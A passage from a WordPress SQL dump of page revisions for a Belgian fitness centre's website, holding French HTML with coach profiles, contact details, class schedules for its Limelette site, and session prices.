VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALLUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-01-20 20:40:16', '2014-01-20 20:40:16', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(475, 1, '2015-04-21 09:03:59', '2015-04-21 09:03:59', '<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\nLes séances de Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2015-04-21 09:03:59', '2015-04-21 09:03:59', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(425, 1, '2014-02-09 20:26:13', '2014-02-09 20:26:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\nLes séances de Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2014-02-09 20:26:13', '2014-02-09 20:26:13', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(426, 1, '2014-02-09 20:29:50', '2014-02-09 20:29:50', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<br>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2014-02-09 20:29:50', '2014-02-09 20:29:50', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(427, 1, '2014-02-09 20:31:03', '2014-02-09 20:31:03', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n\r\n\r\n<strong>Réserver vos séances de Team Training en ligne :</strong> <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2014-02-09 20:31:03', '2014-02-09 20:31:03', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(428, 1, '2014-02-09 20:33:04', '2014-02-09 20:33:04', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation de séances :</h2>\r\n<strong>Réserver vos séances de Team Training en ligne :</strong> <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2014-02-09 20:33:04', '2014-02-09 20:33:04', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(429, 1, '2014-02-09 20:36:26', '2014-02-09 20:36:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', 